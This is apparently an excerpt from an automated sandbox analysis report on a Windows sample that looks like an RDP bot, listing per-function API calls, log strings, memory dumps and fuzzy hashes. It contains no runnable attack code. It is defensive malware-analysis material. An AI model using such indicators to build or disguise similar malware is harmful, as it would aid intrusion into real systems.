APIs

Part of subcall function 00007FFE11509FF4: LoadLibraryA.KERNEL32 ref: 00007FFE1150A002

Part of subcall function 00007FFE11509F73: GetProcAddress.KERNEL32 ref: 00007FFE11509F93

GetLastError.KERNEL32 ref: 00007FFE11503A80

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

Wow64DisableWow64FsRedirection, xrefs: 00007FFE11503A38
[I] (%s) -> %s, xrefs: 00007FFE11503A6A
kernel32, xrefs: 00007FFE11503A24
Done, xrefs: 00007FFE11503A5C
fs_wow_redir_disable, xrefs: 00007FFE11503A63, 00007FFE11503A89
[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu), xrefs: 00007FFE11503A90

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: AddressErrorLastLibraryLoadProcfflushfwrite
String ID: Done$Wow64DisableWow64FsRedirection$[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_disable$kernel32
API String ID: 1533789296-1853374401
Opcode ID: 959520b5154ecb97bc209f2a5e3c0967861b68b6872db441ba1d49edeb65a9c6
Instruction ID: edb98f2deff4a6a4699f9c9741db4aa4b79ba6319134d9e5ea9d70c8d579d529
Opcode Fuzzy Hash: 959520b5154ecb97bc209f2a5e3c0967861b68b6872db441ba1d49edeb65a9c6
Instruction Fuzzy Hash: 4E0121A0E1DD4394FB52D797EC903B9276A6F40360F8550BAD40E866B6FF6CE985C300

Function 00007FFE11502004 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FFE11502024
CloseHandle.KERNEL32 ref: 00007FFE11502031

Part of subcall function 00007FFE11501C27: EnterCriticalSection.KERNEL32 ref: 00007FFE11501C5F
Part of subcall function 00007FFE11501C27: GetProcessHeap.KERNEL32 ref: 00007FFE11501CBB
Part of subcall function 00007FFE11501C27: HeapFree.KERNEL32 ref: 00007FFE11501CCC
Part of subcall function 00007FFE11501C27: LeaveCriticalSection.KERNEL32 ref: 00007FFE11501CEF

DeleteCriticalSection.KERNEL32 ref: 00007FFE1150205F

Strings

ebus_cleanup, xrefs: 00007FFE11502082
[I] (%s) -> %s, xrefs: 00007FFE11502089
Done, xrefs: 00007FFE1150207B

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: CriticalSection$Heap$CloseDeleteEnterFreeHandleLeaveObjectProcessSingleWait
String ID: Done$[I] (%s) -> %s$ebus_cleanup
API String ID: 3198640931-3713968270
Opcode ID: b145425d1acac5d6f063df52e29609869e864dbf6be9dad906aabba8e617ea69
Instruction ID: 43752b88071c9262c05fc410146baa1ec9f2c0e04b72cd843a29b17ba79b6b6d
Opcode Fuzzy Hash: b145425d1acac5d6f063df52e29609869e864dbf6be9dad906aabba8e617ea69
Instruction Fuzzy Hash: 73019260A48E8280FB129B57E894378236BAB557B4FA043B6D83D462F0CF2DA545C301

Function 00007FFE1150100C Relevance: 9.1, APIs: 6, Instructions: 101sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,00000000,00007FFE11512034,00007FFE11501240), ref: 00007FFE1150107F
_amsg_exit.MSVCRT(?,00000000,00007FFE11512034,00007FFE11501240), ref: 00007FFE115010A1
_initterm.MSVCRT ref: 00007FFE115010DB
Sleep.KERNEL32(?,00000000,00007FFE11512034,00007FFE11501240), ref: 00007FFE11501132
_amsg_exit.MSVCRT(?,00000000,00007FFE11512034,00007FFE11501240), ref: 00007FFE11501149

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: Sleep_amsg_exit$_initterm
String ID:
API String ID: 2193611136-0
Opcode ID: 856a5a06293a3ecf417550f08644ae4fca005ea1389400e4a4827bbcc1fe1e40
Instruction ID: ec879bf9f8097596251a3d31dfa87c3132a702965958a1f816e81e1c2eddb134
Opcode Fuzzy Hash: 856a5a06293a3ecf417550f08644ae4fca005ea1389400e4a4827bbcc1fe1e40
Instruction Fuzzy Hash: FA417121F0DE4286F7669B67E89037D329EAF547A4F5840B9DD4D873B1DE2CE9408342

Function 00007FFE1150C7E5 Relevance: 9.0, APIs: 2, Strings: 4, Instructions: 24COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FFE1150C7FD
CloseHandle.KERNEL32 ref: 00007FFE1150C803

Strings

H:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FFE1150C819
process_free, xrefs: 00007FFE1150C827
(pi != NULL), xrefs: 00007FFE1150C820
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1150C82E

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: CloseHandle
String ID: (pi != NULL)$H:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$process_free
API String ID: 2962429428-2428953624
Opcode ID: 1be9b12f09bbff63a9c0c449d041de5bcf907d81c683f8985a037333a4f6a461
Instruction ID: 6668dc402a5856cc6a68c2efc9ac0f69f5618d51ef5b03b0da911ea29f4ad16c
Opcode Fuzzy Hash: 1be9b12f09bbff63a9c0c449d041de5bcf907d81c683f8985a037333a4f6a461
Instruction Fuzzy Hash: B4F01C61A08D4B90FB11DBAAEC502A92719BF507A8F9941B3DD0E47674DE3CEA46C300

Function 00007FF76A9088EE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00000000,000001DE38FB13D0,00007FF76A908CDE,?,?,?,?,?,?,00000001,00007FF76A908E4A,?,?,00007FF76A9184F8), ref: 00007FF76A90892F

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

GetProcessHeap.KERNEL32(?,?,00000000,000001DE38FB13D0,00007FF76A908CDE,?,?,?,?,?,?,00000001,00007FF76A908E4A,?,?,00007FF76A9184F8), ref: 00007FF76A908962
HeapFree.KERNEL32(?,?,00000000,000001DE38FB13D0,00007FF76A908CDE,?,?,?,?,?,?,00000001,00007FF76A908E4A,?,?,00007FF76A9184F8), ref: 00007FF76A908973

Strings

[I] (%s) -> Done(name=%s), xrefs: 00007FF76A908940
units_cleanup, xrefs: 00007FF76A908939

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: FreeHeap$LibraryProcessfflushfwrite
String ID: [I] (%s) -> Done(name=%s)$units_cleanup
API String ID: 1108967834-2645831314
Opcode ID: e9e47ca765005b47a752e40d5b5feb42eb5ee7974852023ff9d37cefed71fc12
Instruction ID: 45fc9d9c3b6c2032e812333bc90d074e4a8821646ad05cf6e050d31be619e7ec
Opcode Fuzzy Hash: e9e47ca765005b47a752e40d5b5feb42eb5ee7974852023ff9d37cefed71fc12
Instruction Fuzzy Hash: 8511EA65B0DB06C5FA59BB11E8442B8B3A0BF44B84FE484B9C95D873A0DE3CAD45D331

Function 00007FF76A909E39 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 21COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF76A909E53
DeleteCriticalSection.KERNEL32(?,?,?,?,00007FF76A9089B9,?,?,00000000,00007FF76A908CE3,?,?,?,?,?,?,00000001), ref: 00007FF76A909E80

Strings

[I] (%s) -> %s, xrefs: 00007FF76A909E9F
debug_cleanup, xrefs: 00007FF76A909E98
Done, xrefs: 00007FF76A909E91

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: CriticalDeleteSectionfclose
String ID: Done$[I] (%s) -> %s$debug_cleanup
API String ID: 3387974148-4247581856
Opcode ID: c4fcf39efeefee122eb95084b5db9d4973f73945639ccbcc38e9f30a82c878b1
Instruction ID: 5697071cc3ba39e738d1c98c2d8273b7d9642f2ac329aec11816606efde07e5f
Opcode Fuzzy Hash: c4fcf39efeefee122eb95084b5db9d4973f73945639ccbcc38e9f30a82c878b1
Instruction Fuzzy Hash: 81F01D60E09743C8FA1ABB69E8A5370B2606F55748FF445F4C10CC61A0CF3C684AA770

Function 00007FF76A90A27A Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00007FF76A9184F8,00000000,?,?,?,00007FF76A9184F0,00007FF76A901208,?,?,?,00007FF76A901313), ref: 00007FF76A90A4C7

Strings

Unknown pseudo relocation bit size %d., xrefs: 00007FF76A90A3F0
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF76A90A462
Unknown pseudo relocation protocol version %d., xrefs: 00007FF76A90A36D

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 544645111-1286557213
Opcode ID: f376e8e6a081a73d79aaf6fb7616c898084fe598007c7d48d63f28f0360e0926
Instruction ID: 2b759928de90daf81709463ecf87a8ac8d14365c3910750e7188bbe3631d2cd2
Opcode Fuzzy Hash: f376e8e6a081a73d79aaf6fb7616c898084fe598007c7d48d63f28f0360e0926
Instruction Fuzzy Hash: 1B51B062F08752C9FB10AB19D444278B3A1AB44BE8FA481B9D91DC7BC5DE3CE981C760

Function 00007FFE1150CF4A Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?,?,00007FFE11512034,?,?,00007FFE1150119E), ref: 00007FFE1150D197

Strings

%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FFE1150D132
Unknown pseudo relocation bit size %d., xrefs: 00007FFE1150D0C0
Unknown pseudo relocation protocol version %d., xrefs: 00007FFE1150D03D

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 544645111-1286557213
Opcode ID: ca1dfa075a6876562fc164620a82b2737de82aab9a8b45a2298a9535492db545
Instruction ID: 197a1a9de9aa4cac500f7cac1cf144364292ee5ca1c83450faa72b5f38669b4e
Opcode Fuzzy Hash: ca1dfa075a6876562fc164620a82b2737de82aab9a8b45a2298a9535492db545
Instruction Fuzzy Hash: 43518B62F08E4285EB20CBA6D95067D27A9AB41BF4F0482B9D91C477F9DE3DE582C700

Function 00007FFE115023A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE115023CE
WSAGetLastError.WS2_32 ref: 00007FFE115023E5

Strings

[E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE115023FC
tcp_set_keepalive, xrefs: 00007FFE115023F5

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_keepalive
API String ID: 1729277954-536111009
Opcode ID: 078f60ad97f9412ac0ae0b04a1911b99cd0328628c0a8e5e7dd17e81b0a1bcc0
Instruction ID: 46cfaaf03900a5ae26517651b408eca78f6406fce2df73ee3f9c35ccea089cdf
Opcode Fuzzy Hash: 078f60ad97f9412ac0ae0b04a1911b99cd0328628c0a8e5e7dd17e81b0a1bcc0
Instruction Fuzzy Hash: ECF0F061A0C90296E3509B67B8404A96669AB887B4F408275ED2D837F4DF3CC50A8B00

Function 00007FF76A901360 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF76A9084AF), ref: 00007FF76A90137E
GetLastError.KERNEL32(?,?,?,?,?,?,00007FF76A9084AF), ref: 00007FF76A90139B

Strings

[E] (%s) -> GetModuleHandleExA failed(gle=%lu), xrefs: 00007FF76A9013AB
module_current, xrefs: 00007FF76A9013A4

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: ErrorHandleLastModule
String ID: [E] (%s) -> GetModuleHandleExA failed(gle=%lu)$module_current
API String ID: 4242514867-2427012484
Opcode ID: 5eacd447ff954da9d85cf229d6cc2382b6146f4b768f5b19ce8662d7776913ca
Instruction ID: f1d8a920d1ee08540b585f01076f5fc9812e9d8e8b94988c0de95e640d8333a4
Opcode Fuzzy Hash: 5eacd447ff954da9d85cf229d6cc2382b6146f4b768f5b19ce8662d7776913ca
Instruction Fuzzy Hash: CCF03021B08B02C0F721AB14E444369A760FB857DCFF400B6D55D82AA4DE3CD518C770

Function 00007FFE11509CC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

GetModuleHandleExA.KERNEL32 ref: 00007FFE11509CDE
GetLastError.KERNEL32 ref: 00007FFE11509CFB

Strings

[E] (%s) -> GetModuleHandleExA failed(gle=%lu), xrefs: 00007FFE11509D0B
module_current, xrefs: 00007FFE11509D04

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorHandleLastModule
String ID: [E] (%s) -> GetModuleHandleExA failed(gle=%lu)$module_current
API String ID: 4242514867-2427012484
Opcode ID: e5e8753456e70cf3621af28bfa07c7a50d365ed87c29208ff22d9393e92c4bb1
Instruction ID: e51a411dc8547ad62a3353eb60dc9b29f3a11f73acd5c19546a2570aec94f3ba
Opcode Fuzzy Hash: e5e8753456e70cf3621af28bfa07c7a50d365ed87c29208ff22d9393e92c4bb1
Instruction Fuzzy Hash: 9EF0C061E0CE4291EB219B66E8403AD3769FB44778F9401BAD54D426B8EF3CD249C751

Function 00007FF76A90E0F0 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF76A90E16B
IsDBCSLeadByteEx.KERNEL32 ref: 00007FF76A90E186
MultiByteToWideChar.KERNEL32 ref: 00007FF76A90E1DA
_errno.MSVCRT ref: 00007FF76A90E1E4

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: Byte$CharMultiWide$Lead_errno
String ID:
API String ID: 2766522060-0
Opcode ID: e52bfd8392137d51bb9391ae47cf714bbbdc63591f019e6cdc8d20eb038805a4
Instruction ID: 8a2ebba3b83ecd53293231e73395a5d95647588790a6ca3b9a4e25f5793048a6
Opcode Fuzzy Hash: e52bfd8392137d51bb9391ae47cf714bbbdc63591f019e6cdc8d20eb038805a4
Instruction Fuzzy Hash: B831C472A0C381C9F3716B25A84037DAA90AB967C8FA84179EA98837D5DB3CD9458721

Function 00007FFE11510D40 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FFE11510DBB
IsDBCSLeadByteEx.KERNEL32 ref: 00007FFE11510DD6
MultiByteToWideChar.KERNEL32 ref: 00007FFE11510E2A
_errno.MSVCRT ref: 00007FFE11510E34

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: Byte$CharMultiWide$Lead_errno
String ID:
API String ID: 2766522060-0
Opcode ID: 1a1b0acdbf6aa5c38bd153ef633c052549a54d5c047baae8f056b3c432a9561b
Instruction ID: da2b32467234927e285b596978d5325579247d127e92f8e39c343e796344371f
Opcode Fuzzy Hash: 1a1b0acdbf6aa5c38bd153ef633c052549a54d5c047baae8f056b3c432a9561b
Instruction Fuzzy Hash: 4331C476B0CA818AE7724F33A40036D6A9AAB557A4F448275EA8C877F5DF3CE4458B01

Function 00007FF76A90A530 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 00007FF76A90A5E6
signal.MSVCRT ref: 00007FF76A90A5FB

Strings

CCG , xrefs: 00007FF76A90A546

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: signal
String ID: CCG
API String ID: 1946981877-1584390748
Opcode ID: 3d48847964a56b40779e632f9fb4250c1fb945e224c615d2d4335e1e0d083621
Instruction ID: 7caf830854561543a3e0bd3b8fb0c0ea96f72787d292e7cb11da8dd041fef446
Opcode Fuzzy Hash: 3d48847964a56b40779e632f9fb4250c1fb945e224c615d2d4335e1e0d083621
Instruction Fuzzy Hash: 3E21C194E0C702C9FE783224984437CA091AF593E4FB88ABEC90DC7AD0DD1CE8C141B1

Function 00007FF76A909FE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF76A90A09A

Strings

Unknown error, xrefs: 00007FF76A909FF7
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF76A90A08D

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 6939521f6767264a8fb87927fdf9a759c58c7e4e71ae3242473c69dd497d05cf
Instruction ID: e02593e06cba22872360ab42ae0545c11df1e83c68857b004274f02df365911d
Opcode Fuzzy Hash: 6939521f6767264a8fb87927fdf9a759c58c7e4e71ae3242473c69dd497d05cf
Instruction Fuzzy Hash: F6115461904F84C6E6119F1CD4413EAB370FF9E399FA05325EBCC56624DF39D5528B00

Function 00007FFE115049BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE11504A35

Strings

fs_file_read, xrefs: 00007FFE11504A72
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE11504A79

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 28cdbc242a6302d443cb74f0fd5ade0e8a5883f5600bb2d8e31f58cf0c742293
